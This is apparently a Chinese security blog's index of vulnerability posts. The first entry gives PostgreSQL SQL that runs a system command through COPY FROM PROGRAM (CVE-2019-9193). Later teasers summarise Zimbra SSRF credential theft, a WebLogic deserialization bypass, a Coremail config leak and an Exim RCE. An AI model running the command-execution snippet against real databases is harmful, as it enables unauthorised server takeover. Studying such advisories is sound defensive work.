CVE-2019-9193

CVE-2019-9193

-- 先删除你想要使用但是已经存在的表DROP TABLE IF EXISTS cmd_exec;-- 创建保存系统命令输出的表CREATE TABLE cmd_exec(cmd_output text);-- 执行系统命令利用特定函数COPY cmd_exec FROM PROGRAM 'id'; -- 查看执行结果SELECT * FROM cmd_exec;

漏洞解析 2023-08-07 PM 0条
以SSRF流量转发方式获取Zimbra邮件服务中所有用户明文凭据

以SSRF流量转发方式获取Zimbra邮件服务中所有用户明文凭据

本文讲述了作者以邮件登录服务为突破口,利用其中的Zimbra应用功能和邮件端口配置bug,可以对目标邮件服务端执行流量转发设置(SSRF),实现对所有登录用户的明文凭据信息窃取。背景介绍Cafebazaar(巴扎应用商店):成立于2011年4月的一个伊朗安卓APP商店,专门给波斯语用户提供APP应用服务,其上有164000多个伊朗和国际软件游戏、社交媒体、信息等其他应用软件。2019年4月,...

漏洞解析 2020-09-27 PM 0条
Oracle WebLogic 最新远程反序列化命令执行0day漏洞(CVE-2019-2725补丁绕过)预警

Oracle WebLogic 最新远程反序列化命令执行0day漏洞(CVE-2019-2725补丁绕过)预警

0x00 事件背景2019年06月15日,360CERT监测到在野的Oracle Weblogic远程反序列化命令执行漏洞,该漏洞绕过了最新的Weblogic补丁(CVE-2019-2725),攻击者可以发送精心构造的恶意HTTP请求,在未授权的情况下远程执行命令。目前官方补丁未发布,漏洞细节未公开。360CERT经研判后判定该漏洞综合评级为“高危”,强烈建议受影响的用户尽快根据临时修补建议...

漏洞解析,安全预警 2019-06-17 AM 0条
Coremail敏感文件泄露漏洞预警

Coremail敏感文件泄露漏洞预警

 0x00 事件背景2019年6月14日上午,360CERT监控到互联网中在传播Coremail的配置信息泄露的POC,通过360CERT研判分析,确认其POC有效。通过POC可获取Coremail配置文件信息,包括配置IP、端口、文件路径、数据库密码、用户名等信息。 百度百科介绍:Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业...

漏洞解析,安全预警 2019-06-15 AM 0条
CVE-2019-10149:Exim远程命令执行漏洞预警分析

CVE-2019-10149:Exim远程命令执行漏洞预警分析

报告编号:B6-2019-061201报告来源:360-CERT报告作者:360-CERT更新日期:2019-06-120x00 漏洞详情日前,安全研究人员发现Exim邮件服务器存在一个远程命令执行漏洞,漏洞编号为CVE-2019-10149。该漏洞在默认配置下可被本地攻击者直接利用,通过低权限用户执行root权限命令,远程攻击者需要修改默认配置。为了在默认配置下远程利用该漏洞,远程攻击者需...

漏洞解析,安全预警 2019-06-13 AM 0条